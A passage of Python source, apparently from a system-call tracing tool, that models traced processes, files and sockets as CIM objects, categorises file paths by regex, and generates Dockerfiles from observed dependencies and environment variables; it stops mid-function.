if not G_ReplayMode:
# Maybe this cannot be accessed.
if is_platform_linux:
filnam_environ = "/proc/%d/environ" % self.Handle
try:
self.EnvironmentVariables = {}
with open(filnam_environ) as fd_env:
for one_pair in fd_env.readline().split('\0'):
env_key, colon, env_val = one_pair.partition('=')
if colon:
self.EnvironmentVariables[env_key] = env_val
except:
pass
if not G_ReplayMode and psutil:
try:
# FIXME: If rerunning a simulation, this does not make sense.
# Same for CIM_DataFile when this is not the target machine.
proc_obj = psutil.Process(proc_id)
except:
# Maybe this is replaying a former session and if so, the process exited.
proc_obj = None
else:
proc_obj = None
if proc_obj:
try:
self.Name = proc_obj.name()
exec_fil_nam = proc_obj.exe().replace("\\", "/")
# The process id is not needed because the path is absolute and the process CIM object
# should already be created. However, in the future it might reuse an existing context.
objects_context = ObjectsContext(proc_id)
exec_fil_obj = objects_context._class_model_to_object_path(CIM_DataFile, exec_fil_nam)
# The process id is not needed because the path is absolute.
# However, in the future it might reuse an existing context.
# Also, the process must not be inserted twice.
self.set_executable_path(exec_fil_obj)
self.CommandLine = proc_obj.cmdline()
except:
self.Name = None
try:
# Maybe the process has exit.
self.Username = proc_obj.username()
self.Priority = proc_obj.nice()
except:
pass
try:
self.CurrentDirectory = proc_obj.cwd().replace("\\", "/")
except:
# psutil.ZombieProcess process still exists but it's a zombie
# Another possibility would be to use the parent process.
self.CurrentDirectory = G_CurrentDirectory
else:
if proc_id > 0:
self.Name = "pid=%s" % proc_id
else:
self.Name = ""
# TODO: This could be deduced with calls to setuid().
self.Username = ""
# TODO: This can be partly deduced with calls to chdir() etc...
# so it would not be necessary to install psutil.
self.CurrentDirectory = G_CurrentDirectory
self.Priority = 0
# In the general case, it is not possible to get the parent process,
# because it might replay a session. So, it can only rely on the successive function calls.
# Therefore, the parent processes must be stored before the subprocesses.
# If this process appears for the first time and there is only one other process, then it is its parent.
# It helps if the first vfork() is never finished, and if we did not get the main process id.
map_procs = G_mapCacheObjects[CIM_Process.__name__]
keys_procs = list(map_procs.keys())
cim_ontology_list = ['Handle']
@classmethod
def DisplaySummary(cls, fdSummaryFile, cimKeyValuePairs):
fdSummaryFile.write("Processes:\n")
list_CIM_Process = G_mapCacheObjects[CIM_Process.__name__]
for objPath, objInstance in sorted(list_CIM_Process.items()):
objInstance.Summarize(fdSummaryFile)
fdSummaryFile.write("\n")
m_attributes_priorities = ["Handle", "Name", "CommandLine", "CreationDate", "TerminationDate", "Priority"]
def XMLOneLevelSummary(self, strm, margin=" "):
self.m_isVisited = True
strm.write("%s<CIM_Process Handle='%s'>\n" % (margin, self.Handle))
subMargin = margin + " "
self.PlainToXML(strm, subMargin)
FileAccess.serialize_list_to_XML(strm, self.m_ProcessFileAccesses, subMargin, False)
for objInstance in self.m_subProcesses:
objInstance.XMLOneLevelSummary(strm, subMargin)
strm.write("%s</CIM_Process>\n" % (margin))
@staticmethod
def TopProcessFromProc(objInstance):
"""This returns the top-level parent of a process."""
while True:
parentProc = objInstance.m_parentProcess
if not parentProc: return objInstance
objInstance = parentProc
@staticmethod
def GetTopProcesses():
"""This returns a list of top-level processes, which have no parents."""
# This contains all subprocesses.
setSubProcs = set()
for objPath, objInstance in G_mapCacheObjects[CIM_Process.__name__].items():
for oneSub in objInstance.m_subProcesses:
setSubProcs.add(oneSub)
lstTopLvl = []
for objPath, objInstance in G_mapCacheObjects[CIM_Process.__name__].items():
if objInstance not in setSubProcs:
lstTopLvl.append(objInstance)
return lstTopLvl
# When parsing the last system call, it sets the termination date for all processes.
@staticmethod
def GlobalTerminationDate(timeEnd):
for objPath, objInstance in G_mapCacheObjects[CIM_Process.__name__].items():
if not objInstance.TerminationDate:
objInstance.TerminationDate = timeEnd
@classmethod
def XMLSummary(cls, fd_summary_file, cimKeyValuePairs):
# Find unvisited processes. It does not start from G_top_ProcessId
# because maybe it contains several trees, or subtrees were missed etc...
for objPath, objInstance in sorted(G_mapCacheObjects[CIM_Process.__name__].items()):
try:
objInstance.m_isVisited
continue
except AttributeError:
pass
topObjProc = CIM_Process.TopProcessFromProc(objInstance)
topObjProc.XMLOneLevelSummary(fd_summary_file)
# In text mode, with no special formatting.
def Summarize(self, strm):
strm.write("Process id:%s\n" % self.Handle)
try:
if self.Executable:
strm.write(" Executable:%s\n" % self.Executable)
except AttributeError:
pass
if self.CreationDate:
strStart = _timestamp_to_str(self.CreationDate)
strm.write(" Start time:%s\n" % strStart)
if self.TerminationDate:
strEnd = _timestamp_to_str(self.TerminationDate)
strm.write(" End time:%s\n" % strEnd)
if self.m_parentProcess:
strm.write(" Parent:%s\n" % self.m_parentProcess.Handle)
def SetParentProcess(self, objCIM_Process):
# sys.stdout.write("SetParentProcess proc=%s parent=%s\n" % ( self.Handle, objCIM_Process.Handle ) )
if int(self.Handle) == int(objCIM_Process.Handle):
raise Exception("Self-parent")
self.m_parentProcess = objCIM_Process
self.ParentProcessID = objCIM_Process.Handle
objCIM_Process.m_subProcesses.add(self)
def WaitProcessEnd(self, timeStamp, objCIM_Process):
# sys.stdout.write("WaitProcessEnd: %s linking to %s\n" % (self.Handle,objCIM_Process.Handle))
self.TerminationDate = timeStamp
if not self.m_parentProcess:
self.SetParentProcess(objCIM_Process)
# sys.stdout.write("WaitProcessEnd: %s not linked to %s\n" % (self.Handle,objCIM_Process.Handle))
elif self.m_parentProcess != objCIM_Process:
# sys.stdout.write("WaitProcessEnd: %s not %s\n" % (self.m_parentProcess.Handle,objCIM_Process.Handle))
pass
else:
# sys.stdout.write("WaitProcessEnd: %s already linked to %s\n" % (self.m_parentProcess.Handle,objCIM_Process.Handle))
pass
def set_executable_path(self, objCIM_DataFile):
assert (isinstance(objCIM_DataFile, CIM_DataFile))
self.Executable = objCIM_DataFile.Name
self.m_ExecutableObject = objCIM_DataFile
def set_command_line(self, lstCmdLine):
# TypeError: sequence item 7: expected string, dict found
if lstCmdLine:
self.CommandLine = " ".join([str(elt) for elt in lstCmdLine])
# The command line as a list is needed by Dockerfile.
self.m_commandList = lstCmdLine
def GetCommandLine(self):
try:
if self.CommandLine:
return self.CommandLine
except AttributeError:
pass
try:
commandLine = self.Executable
except AttributeError:
commandLine = ""
return commandLine
def GetCommandList(self):
try:
if self.m_commandList:
return self.m_commandList
except AttributeError:
pass
try:
commandList = [self.Executable]
except AttributeError:
commandList = []
return commandList
def SetThread(self):
self.IsThread = True
# Some system calls are relative to the current directory.
# Therefore, this traces current dir changes due to system calls.
def set_process_current_directory(self, currDirObject):
self.CurrentDirectory = currDirObject.Name
def GetProcessCurrentDir(self):
try:
return self.CurrentDirectory
except AttributeError:
# Maybe it could not be get because the process left too quickly.
return "UnknownCwd"
# This returns an object indexed by the file name and the process id.
# A file might have been opened several times by the same process.
# Therefore, once a file has been closed, the associated file access
# cannot be returned again.
def get_file_access(self, objCIM_DataFile):
one_file_access = FileAccess.lookup_file_access(self, objCIM_DataFile)
return one_file_access
# Other tools to consider:
# dtrace and blktrac and valgrind
# http://www.brendangregg.com/ebpf.html
# class CIM_LogicalFile : CIM_LogicalElement
# {
# string Caption;
# string Description;
# datetime InstallDate;
# string Status;
# uint32 AccessMask;
# boolean Archive;
# boolean Compressed;
# string CompressionMethod;
# string CreationClassName;
# datetime CreationDate;
# string CSCreationClassName;
# string CSName;
# string Drive;
# string EightDotThreeFileName;
# boolean Encrypted;
# string EncryptionMethod;
# string Name;
# string Extension;
# string FileName;
# uint64 FileSize;
# string FileType;
# string FSCreationClassName;
# string FSName;
# boolean Hidden;
# uint64 InUseCount;
# datetime LastAccessed;
# datetime LastModified;
# string Path;
# boolean Readable;
# boolean System;
# boolean Writeable;
# };
class CIM_LogicalFile(CIM_XmlMarshaller):
def __init__(self, path_name):
super(CIM_LogicalFile, self).__init__()
# https://msdn.microsoft.com/en-us/library/aa387236(v=vs.85).aspx
# The Name property is a string representing the inherited name
# that serves as a key of a logical file instance within a file system.
# Full path names should be provided.
# TODO: When the name contains "<" or ">" it cannot be properly displayed in SVG.
# TODO: Also, names like "UNIX:" or "TCP:" should be processed a special way.
self.Name = path_name
# File name without the file name extension. Example: "MyDataFile"
try:
basNa = os.path.basename(path_name)
# There might be several dots, or none.
self.FileName = basNa.split(".")[0]
except:
pass
self.Category = _pathname_to_category(path_name)
self.m_DataFileFileAccesses = []
# Some information are meaningless because they vary between executions.
if G_SameMachine:
try:
objStat = os.stat(path_name)
except:
objStat = None
if objStat:
self.FileSize = objStat.st_size
self.FileMode = objStat.st_mode
self.Inode = objStat.st_ino
self.DeviceId = objStat.st_dev
self.HardLinksNumber = objStat.st_nlink
self.OwnerUserId = objStat.st_uid
self.OwnerGroupId = objStat.st_gid
self.AccessTime = TimeT_to_DateTime(objStat.st_atime)
self.ModifyTime = TimeT_to_DateTime(objStat.st_mtime)
self.CreationTime = TimeT_to_DateTime(objStat.st_ctime)
try:
# This does not exist on Windows.
self.DeviceType = objStat.st_rdev
except AttributeError:
pass
# This is on Windows only.
# self.UserDefinedFlags = objStat.st_flags
# self.FileCreator = objStat.st_creator
# self.FileType = objStat.st_type
# If this is a connected socket:
# 'TCP:[54.36.162.150:37415->82.45.12.63:63708]'
mtchSock = re.match(r"TCP:\[.*->(.*)\]", path_name)
if mtchSock:
self.SetAddrPort(mtchSock.group(1))
else:
# 'TCPv6:[::ffff:54.36.162.150:21->::ffff:82.45.12.63:63703]'
mtchSock = re.match(r"TCPv6:\[.*->(.*)\]", path_name)
if mtchSock:
self.SetAddrPort(mtchSock.group(1))
cim_ontology_list = ['Name']
# class CIM_DataFile : CIM_LogicalFile
# {
# string Caption;
# string Description;
# datetime InstallDate;
# string Status;
# uint32 AccessMask;
# boolean Archive;
# boolean Compressed;
# string CompressionMethod;
# string CreationClassName;
# datetime CreationDate;
# string CSCreationClassName;
# string CSName;
# string Drive;
# string EightDotThreeFileName;
# boolean Encrypted;
# string EncryptionMethod;
# string Name;
# string Extension;
# string FileName;
# uint64 FileSize;
# string FileType;
# string FSCreationClassName;
# string FSName;
# boolean Hidden;
# uint64 InUseCount;
# datetime LastAccessed;
# datetime LastModified;
# string Path;
# boolean Readable;
# boolean System;
# boolean Writeable;
# string Manufacturer;
# string Version;
# };
class CIM_DataFile(CIM_LogicalFile):
def __init__(self, path_name):
super(CIM_DataFile, self).__init__(path_name)
# This creates a map containing all detected files. This map is indexed
# by an informal file category: DLL, data file etc...
@staticmethod
def SplitFilesByCategory():
mapFiles = G_mapCacheObjects[CIM_DataFile.__name__].items()
# TODO: Find a way to define the presentation as a parameter.
# Maybe we can use the list of keys: Just mentioning a property
# means that a sub-level must be displayed.
mapOfFilesMap = {rgxTuple[0]: {} for rgxTuple in G_lstFilters}
# objPath = 'CIM_DataFile.Name="/usr/lib64/libcap.so.2.24"'
for objPath, objInstance in mapFiles:
mapOfFilesMap[objInstance.Category][objPath] = objInstance
return mapOfFilesMap
@classmethod
def DisplaySummary(cls, fdSummaryFile, cimKeyValuePairs):
fdSummaryFile.write("Files:\n")
mapOfFilesMap = CIM_DataFile.SplitFilesByCategory()
try:
filterCats = cimKeyValuePairs["Category"]
except KeyError:
filterCats = None
for categoryFiles, mapFilesSub in sorted(mapOfFilesMap.items()):
fdSummaryFile.write("\n** %s\n" % categoryFiles)
if filterCats and (not categoryFiles in filterCats): continue
for objPath, objInstance in sorted(mapFilesSub.items()):
# sys.stdout.write("Path=%s\n"%objPath)
objInstance.Summarize(fdSummaryFile)
fdSummaryFile.write("\n")
m_attributes_priorities = ["Name", "Category", "SocketAddress"]
def XMLDisplay(self, strm):
margin = " "
strm.write("%s<CIM_DataFile Name='%s'>\n" % (margin, self.Name))
subMargin = margin + " "
self.PlainToXML(strm, subMargin)
FileAccess.serialize_list_to_XML(strm, self.m_DataFileFileAccesses, subMargin, True)
strm.write("%s</CIM_DataFile>\n" % (margin))
@staticmethod
def XMLCategorySummary(fdSummaryFile, mapFilesSub):
for objPath, objInstance in sorted(mapFilesSub.items()):
# sys.stdout.write("Path=%s\n"%objPath)
objInstance.XMLDisplay(fdSummaryFile)
@classmethod
def XMLSummary(cls, fd_summary_file, cimKeyValuePairs):
"""Top-level informations are categories of CIM_DataFile which are not technical
but the regex-based filtering."""
mapOfFilesMap = CIM_DataFile.SplitFilesByCategory()
try:
filterCats = cimKeyValuePairs["Category"]
except KeyError:
filterCats = None
for categoryFiles, mapFilesSub in sorted(mapOfFilesMap.items()):
if len(mapFilesSub) == 0:
# No need to write a category name if it is empty.
continue
fd_summary_file.write(" <FilesCategory category='%s'>\n" % categoryFiles)
if filterCats and (not categoryFiles in filterCats): continue
CIM_DataFile.XMLCategorySummary(fd_summary_file, mapFilesSub)
fd_summary_file.write(" </FilesCategory>\n")
def Summarize(self, strm):
try:
# By default, this attribute is not set.
if self.IsExecuted:
return
except AttributeError:
pass
strm.write("Path:%s\n" % self.Name)
for filAcc in self.m_DataFileFileAccesses:
if filAcc.OpenTime:
strOpen = _timestamp_to_str(filAcc.OpenTime)
strm.write(" Open:%s\n" % strOpen)
try:
strm.write(" Open times:%d\n" % filAcc.NumOpen)
except AttributeError:
pass
if filAcc.CloseTime:
strClose = _timestamp_to_str(filAcc.CloseTime)
strm.write(" Close:%s\n" % strClose)
# Only if this is a socket.
# The original socket parameters might have been passed as a dict like:
# "connect(6<UNIX:[587259]>, {sa_family=AF_LOCAL, sun_path="/var/run/nscd/socket"}, 110)"
# But it might have been truncated like:
# "['st_mode=S_IFREG|0644', 'st_size=121043', '...']"
# So we are only sure that it is an array.
try:
for saKeyValue in self.SocketAddress:
strm.write(" %s\n" % saKeyValue)
except AttributeError:
pass
def set_is_executed(self):
self.IsExecuted = True
# The input could be IPV4 or IPV6:
# '82.45.12.63:63708]'
# '::ffff:82.45.12.63:63703]'
def SetAddrPort(self, pathIP):
ixEq = pathIP.rfind(":")
if ixEq < 0:
self.Destination = pathIP
else:
self.Port = pathIP[ixEq + 1:]
addrIP = pathIP[:ixEq]
try:
self.Destination = socket.gethostbyaddr(addrIP)[0]
except:
self.Destination = addrIP
@staticmethod
def GetExposedPorts():
"""this is is the list of all ports numbers whihc have to be open."""
mapFiles = G_mapCacheObjects[CIM_DataFile.__name__].items()
setPorts = set()
for objPath, objInstance in mapFiles:
try:
setPorts.add(objInstance.Port)
except AttributeError:
pass
return setPorts
m_nonFilePrefixes = ["UNIX:", "TCP:", "TCPv6:", "NETLINK:", "pipe:", "UDP:", "UDPv6:", ]
def is_plain_file(self):
if self.Name:
for pfx in CIM_DataFile.m_nonFilePrefixes:
if self.Name.startswith(pfx):
return False
return True
return False
# class CIM_Directory : CIM_LogicalFile
# {
# uint32 AccessMask;
# boolean Archive;
# string Caption;
# boolean Compressed;
# string CompressionMethod;
# string CreationClassName;
# datetime CreationDate;
# string CSCreationClassName;
# string CSName;
# string Description;
# string Drive;
# string EightDotThreeFileName;
# boolean Encrypted;
# string EncryptionMethod;
# string Extension;
# string FileName;
# uint64 FileSize;
# string FileType;
# string FSCreationClassName;
# string FSName;
# boolean Hidden;
# datetime InstallDate;
# uint64 InUseCount;
# datetime LastAccessed;
# datetime LastModified;
# string Name;
# string Path;
# boolean Readable;
# string Status;
# boolean System;
# boolean Writeable;
# };
class CIM_Directory(CIM_LogicalFile):
def __init__(self, path_name):
super(CIM_Directory, self).__init__(path_name)
# This must appear AFTER the declaration of classes.
_class_name_to_subclass = {cls.__name__: cls for cls in leaf_derived_classes(CIM_XmlMarshaller)}
# os.path.abspath removes things like . and .. from the path
# giving a full path from the root of the directory tree to the named file (or symlink)
def to_real_absolute_path(directory_path, file_basename):
# This conversion to avoid "TypeError: Can't mix strings and bytes in path components"
if isinstance(directory_path, six.binary_type):
directory_path = directory_path.decode("utf-8")
if isinstance(file_basename, six.binary_type):
file_basename = file_basename.decode("utf-8")
# This does not apply to pseudo-files such as: "pipe:", "TCPv6:" etc...
# It must not filter Windows paths such as "C:\\xxxxx"
if is_platform_linux and re.match(u"^[0-9a-zA-Z_]+:", file_basename):
return file_basename
if file_basename in [u"stdout", u"stdin", u"stderr"]:
return file_basename
join_path = os.path.join(directory_path, file_basename)
norm_path = os.path.realpath(join_path)
if not is_platform_linux:
norm_path = norm_path.replace(u"\\", "/")
return norm_path
################################################################################
# This contains all CIM objects: CIM_Process, CIM_DataFile etc...
# and is used to generate the summary. Each time an object is created,
# updated or deleted, an event might be sent to a Survol server.
G_mapCacheObjects = None
# Read from a real process or from the log file name when replaying a session.
# It is conceptually part of an ObjectsContext.
G_topProcessId = None
################################################################################
# This helps creating CIM objects based on their class name a key-value pairs
# defined from the ontology. The role of this context object is to contain
# everything which is needed to create a CIM object without ambiguity.
# For example, when creating a CIM_DataFile, only the relative path name
# might ba available. So, the process current work dir is given by this context.
class ObjectsContext:
def __init__(self, process_id = None):
self._process_id = process_id
def attributes_to_cim_object(self, cim_class_name, **cim_attributes_dict):
if cim_class_name == "CIM_Process":
cim_key_handle = cim_attributes_dict['Handle']
sys.stderr.write("attributes_to_cim_object CIM_Process cim_key_handle=%s self._process_id=%s\n"
% (cim_key_handle, self._process_id))
return self.ToObjectPath_CIM_Process(cim_key_handle)
if cim_class_name == "CIM_DataFile":
file_pathname = cim_attributes_dict['Name']
return self.ToObjectPath_CIM_DataFile(file_pathname)
# In the general case, reorder the arguments.
cim_object_datafile = CIM_XmlMarshaller.create_instance_from_class_name(cim_class_name, **cim_attributes_dict)
return cim_object_datafile
def ToObjectPath_CIM_Process(self, process_id):
returned_object = self._class_model_to_object_path(CIM_Process, process_id)
map_procs = G_mapCacheObjects[CIM_Process.__name__]
#sys.stderr.write("map_procs.keys()=%s\n" % str(map_procs.keys()))
if process_id != self._process_id:
context_process_obj_path = CIM_Process.CreateMonikerKey(self._process_id)
sys.stderr.write("context_process_obj_path=%s\n" % context_process_obj_path)
parent_proc_obj = map_procs[context_process_obj_path]
returned_object.SetParentProcess(parent_proc_obj)
return returned_object
# It might be a Linux socket or an IP socket.
# The pid can be added so we know which process accesses this file.
def ToObjectPath_CIM_DataFile(self, pathName):
if isinstance(pathName, six.binary_type):
pathName = pathName.decode("utf-8")
assert isinstance(pathName, six.text_type)
if self._process_id:
# Maybe this is a relative file, and to make it absolute,
# the process is needed.
objProcess = self.ToObjectPath_CIM_Process(self._process_id)
dirPath = objProcess.GetProcessCurrentDir()
else:
# At least it will suppress ".." etc...
dirPath = ""
pathName = to_real_absolute_path(dirPath, pathName)
objDataFile = self._class_model_to_object_path(CIM_DataFile, pathName)
return objDataFile
def _class_model_to_object_path(self, class_model, *ctor_args):
global G_mapCacheObjects
map_objs = G_mapCacheObjects[class_model.__name__]
obj_path = class_model.CreateMonikerKey(*ctor_args)
try:
the_obj = map_objs[obj_path]
except KeyError:
if class_model.__name__ == "CIM_Process":
# FIXME: IT IS CALLED TOO OFTEN, FOR EACH CIM_DataFile !!
sys.stderr.write("_class_model_to_object_path %s CIM_Process args=%s\n" % (sys._getframe(1).f_code.co_name, str(*ctor_args)))
the_obj = class_model(*ctor_args)
map_objs[obj_path] = the_obj
return the_obj
################################################################################
def generate_dockerfile(dockerFilename):
fdDockerFile = open(dockerFilename, "w")
# This write in the DockerFile, the environment variables accessed
# by processes. For the moment, all env vars are mixed together,
# which is inexact, strictly speaking.
def _write_environment_variables():
for envNam in G_EnvironmentVariables:
envVal = G_EnvironmentVariables[envNam]
if envVal == "":
# Error response from daemon: ENV must have two arguments
envVal = '""'
fdDockerFile.write("ENV %s %s\n" % (envNam, envVal))
fdDockerFile.write("\n")
def _write_process_tree():
"""Only for documentation purpose"""
def WriteOneProcessSubTree(objProc, depth):
commandLine = objProc.GetCommandLine()
if not commandLine:
commandLine = "????"
fdDockerFile.write("# %s -> %s : %s %s\n" % (
_timestamp_to_str(objProc.CreationDate), _timestamp_to_str(objProc.TerminationDate), " " * depth, commandLine))
for subProc in sorted(objProc.m_subProcesses, key=lambda x: x.Handle):
WriteOneProcessSubTree(subProc, depth + 1)
fdDockerFile.write("# Processes tree\n")
procsTopLevel = CIM_Process.GetTopProcesses()
for oneProc in sorted(procsTopLevel, key=lambda x: x.Handle):
WriteOneProcessSubTree(oneProc, 1)
fdDockerFile.write("\n")
currNow = datetime.datetime.now()
currDatTim = currNow.strftime("%Y-%m-%d %H:%M:%S:%f")
fdDockerFile.write("# Dockerfile generated %s\n" % currDatTim)
dockerDirectory = os.path.dirname(dockerFilename)
fdDockerFile.write("# Directory %s\n" % dockerDirectory)
fdDockerFile.write("\n")
fdDockerFile.write("FROM docker.io/fedora\n")
fdDockerFile.write("\n")
fdDockerFile.write("MAINTAINER contact@primhillcomputers.com\n")
fdDockerFile.write("\n")
GenerateDockerProcessDependencies(dockerDirectory, fdDockerFile)
# Top-level processes, which starts the other ones.
# Probably there should be one only, but this is not a constraint.
procsTopLevel = CIM_Process.GetTopProcesses()
for oneProc in procsTopLevel:
# TODO: Possibly add the command "VOLUME" ?
currDir = oneProc.GetProcessCurrentDir()
fdDockerFile.write("WORKDIR %s\n" % currDir)
commandList = oneProc.GetCommandList()
if commandList:
# If the string length read by ltrace or strace is too short,
# some arguments are truncated: 'CMD ["python TestProgs/big_mysql_..."]'
# There should be one CMD command only !
strCmd = ",".join('"%s"' % wrd for wrd in commandList)
fdDockerFile.write("CMD [ %s ]\n" % strCmd)
fdDockerFile.write("\n")
portsList = CIM_DataFile.GetExposedPorts()
if portsList:
fdDockerFile.write("# Port numbers:\n")
for onePort in portsList:
try:
txtPort = socket.getservbyport(int(onePort))
fdDockerFile.write("# Service: %s\n" % txtPort)
except:
fdDockerFile.write("# Unknown service number: %s\n" % onePort)
fdDockerFile.write("EXPOSE %s\n" % onePort)
fdDockerFile.write("\n")
_write_environment_variables()
_write_process_tree()
# More examples here:
# https://github.com/kstaken/dockerfile-examples/blob/master/couchdb/Dockerfile
fdDockerFile.close()
return
# Environment variables actually access by processes.
# Used to generate a Dockerfile.
# As read from the strace or ltrace calls to getenv()
G_EnvironmentVariables = None
def init_global_objects():
global G_mapCacheObjects
global G_httpClient
global G_EnvironmentVariables
G_mapCacheObjects = collections.defaultdict(dict)
# This object is used to send triples to a Survol server.
# It is also used to store the triples in a RDF file, which is created by the destructor.
G_httpClient = HttpTriplesClient()
# As read from the strace or ltrace calls to getenv()
G_EnvironmentVariables = {}
objects_context = ObjectsContext(os.getpid())
objects_context._class_model_to_object_path(CIM_ComputerSystem, socket.gethostname())
objects_context._class_model_to_object_path(CIM_OperatingSystem)
objects_context._class_model_to_object_path(CIM_NetworkAdapter, socket.gethostbyname(socket.gethostname()))
def exit_global_objects():
# It is also used to store the triples in a RDF file, which is created by the destructor.
global G_httpClient
# Flushes the data to a file or possibly a Survol agent.
G_httpClient.http_client_shutdown()
# This is not a map, it is not sorted.
# It contains regular expression for classifying file names in categories:
# Shared libraries, source files, scripts, Linux pipes etc...
G_lstFilters = [
("Shared libraries", [
r"^/usr/lib[^/]*/.*\.so",
r"^/usr/lib[^/]*/.*\.so\..*",
r"^/var/lib[^/]*/.*\.so",
r"^/lib/.*\.so",
r"^/lib64/.*\.so",
]),
("System config files", [
"^/etc/",
"^/usr/share/fonts/",
"^/usr/share/fontconfig/",
"^/usr/share/fontconfig/",
"^/usr/share/locale/",
"^/usr/share/zoneinfo/",
]),
("Other libraries", [
"^/usr/share/",
"^/usr/lib[^/]*/",
"^/var/lib[^/]*/",
]),
("System executables", [
"^/bin/",
"^/usr/bin[^/]*/",
]),
("Kernel file systems", [
"^/proc",
"^/run",
]),
("Temporary files", [
"^/tmp/",
"^/var/log/",
"^/var/cache/",
]),
("Pipes and terminals", [
"^/sys",
"^/dev",
"^pipe:",
"^socket:",
"^UNIX:",
"^NETLINK:",
]),
# TCP:[54.36.162.150:41039->82.45.12.63:63711]
("Connected TCP sockets", [
r"^TCP:\[.*->.*\]",
r"^TCPv6:\[.*->.*\]",
]),
("Other TCP/IP sockets", [
"^TCP:",
"^TCPv6:",
"^UDP:",
"^UDPv6:",
]),
("Others", []),
]
def _pathname_to_category(pathName):
"""This match the path name againt the set of regular expressions
defining broad categories of files: Sockets, libraries, temporary files...
These categories are not technical but based on application best practices,
rules of thumbs etc..."""
for rgxTuple in G_lstFilters:
for oneRgx in rgxTuple[1]:
# If the file matches a regular expression,
# then it is classified in this category.
mtchRgx = re.match( oneRgx, pathName )
if mtchRgx:
return rgxTuple[0]
return "Others"
################################################################################
# See https://github.com/nbeaver/pip_file_lookup
pythonCache = {}
def PathToPythonModuleOneFileMakeCache(path):
global pythonCache
try:
import lib_python
pipInstalledDistributions = lib_python.PipGetInstalledDistributions()
if pipInstalledDistributions == None:
return
except ImportError:
return
for dist in pipInstalledDistributions:
# RECORDs should be part of .dist-info metadatas
if dist.has_metadata('RECORD'):
lines = dist.get_metadata_lines('RECORD')
paths = [l.split(',')[0] for l in lines]
distDirectory = dist.location
# Otherwise use pip's log for .egg-info's
elif dist.has_metadata('installed-files.txt'):
paths = dist.get_metadata_lines('installed-files.txt')
distDirectory = dist.egg_info
else:
distDirectory = None
if distDirectory:
for p in paths:
normedPath = os.path.normpath( os.path.join(distDirectory, p) )
try:
pythonCache[normedPath].append( dist )
except KeyError:
pythonCache[normedPath] = [ dist ]
def PathToPythonModuleOneFile(path):
try:
return pythonCache[path]
except KeyError:
return []
def PathToPythonModuleOneFile_OldOldOldOld(path):
try:
import lib_python
pipInstalledDistributions = lib_python.PipGetInstalledDistributions()
if pipInstalledDistributions == None:
return
except ImportError:
return
for dist in pipInstalledDistributions:
# RECORDs should be part of .dist-info metadatas
if dist.has_metadata('RECORD'):
lines = dist.get_metadata_lines('RECORD')
paths = [l.split(',')[0] for l in lines]
distDirectory = dist.location
# Otherwise use pip's log for .egg-info's
elif dist.has_metadata('installed-files.txt'):
paths = dist.get_metadata_lines('installed-files.txt')
distDirectory = dist.egg_info
else:
distDirectory = None
if distDirectory:
if path in [ os.path.normpath( os.path.join(distDirectory, p) ) for p in paths]:
yield dist
# This takes as input a list of files, some of them installed by Python modules,
# and others having nothing to do with Python. It returns two data structures:
# - The set of unique Python modules, some files come from.
# - The remaining list of files, not coming from any Python module.
# This allow to reproduce an environment.
def _files_to_python_modules(unpackagedDataFiles):
setPythonModules = set()
unknownDataFiles = []
for oneFilObj in unpackagedDataFiles:
lstModules = PathToPythonModuleOneFile(oneFilObj.Name)
# TODO: Maybe just take one module ?
# sys.stdout.write("path=%s mods=%s\n"%(oneFilObj.Name, str(list(lstModules))))
addedOne = False
for oneMod in lstModules:
setPythonModules.add( oneMod )
addedOne = True
if not addedOne:
unknownDataFiles.append( oneFilObj )
return setPythonModules, unknownDataFiles
################################################################################
# Display the dependencies of process.
# They might need the installation of libraries. modules etc...
# Sometimes these dependencies are the same.
# The type of process can be: "Binary", "Python", "Perl" etc...
# and for each of these it receive a list of strings, each of them models
# a dependency: a RPM package, a Python module etc...
# Sometimes, they can be be similar and will therefore be loaded once.
# The type of process contains some specific code which can generate
# the Dockerfile commands for handling these dependencies.
#
def GenerateDockerProcessDependencies(dockerDirectory, fdDockerFile):
# TODO: Do not duplicate Python modules installation.
def InstallPipModule(fdDockerFile, namePyModule):
fdDockerFile.write("RUN pip --disable-pip-version-check install %s\n" % namePyModule)
def InstallLinuxPackage(fdDockerFile, packageName):
# packageName = "mariadb-libs-10.1.30-2.fc26.x86_64"
# RUN yum install mariadb-libs
if packageName in InstallLinuxPackage.InstalledPackages:
pckShort = InstallLinuxPackage.InstalledPackages[packageName]
fdDockerFile.write("# Already installed %s -> %s\n" % (pckShort, packageName))
return
# TODO: Maybe there are several versions of the same package.
mtch = re.search(r'(.*)-(.*)-(.*?)\.(.*)', packageName)
if mtch:
(pckShort, version, release, platform) = mtch.groups()
else:
pckShort = packageName
InstallLinuxPackage.InstalledPackages[packageName] = pckShort
# Step 4/7 : RUN yum -y install coreutils # coreutils-8.27-5.fc26.x86_64
# Problem: problem with installed package coreutils-single-8.29-5.fc28.x86_64
# - package coreutils-8.29-5.fc28.x86_64 conflicts with coreutils-single provided by coreutils-single-8.29-5.fc28.x86_64
# (try to add '--allowerasing' to command line to replace conflicting packages or '--skip-broken' to skip uninstallable packages)
# For the moment, this is simpler.
if pckShort in ['coreutils']:
fdDockerFile.write("# Potential conflict with %s , %s\n" % (pckShort, packageName))
else:
fdDockerFile.write("RUN yum -y install %s # %s\n" % (pckShort, packageName))
# Each package is installed only once.
InstallLinuxPackage.InstalledPackages = dict()
# FIXME: We could copy an entire directory tree. When ?
def AddToDockerDir(pathName, filComment=0):
# Maybe the input file does not exist.
if not os.path.exists(pathName):
fdDockerFile.write("# Origin file does not exist:%s\n" % (pathName))
return
# No need to copy directories.
if os.path.isdir(pathName):
return
orgDir = os.path.dirname(pathName)
dstDir = dockerDirectory + "/" + orgDir
if not os.path.exists(dstDir):
os.makedirs(dstDir)
dstPath = dockerDirectory + "/" + pathName
try:
# Copy the file at the right place, so "docker build" can find it.
shutil.copy(pathName, dstPath)
except IOError:
sys.stdout.write("Failed copy %s to %s\n" % (pathName, dstPath))
# Maybe the file is not there because this is in replay mode,
# rerunning a session form the log file. This is not a problem.
fdDockerFile.write("# Cannot add non-existent file:%s\n" % (pathName))
return
if filComment:
fdDockerFile.write("# %s\n" % (filComment))
fdDockerFile.write("ADD %s %s\n" % (pathName, pathName))
# Code dependencies and data files dependencies are different.
# All versions mixed together which is realistic most of times.
class Dependency(object):
def __init__(self):
self.m_accessedCodeFiles = set()
def AddDep(self, pathName):
self.m_accessedCodeFiles.add(pathName)
class DependencyPython(Dependency):
DependencyName = "Python scripts"
def __init__(self):
super(DependencyPython, self).__init__()
@staticmethod
def is_dependency_of(objInstance):
try:
# Detection with strace:
# execve("/usr/bin/python", ["python", "TestProgs/mineit_mys"...], [/* 22 vars */]) = 0
# Detection with ltrace:
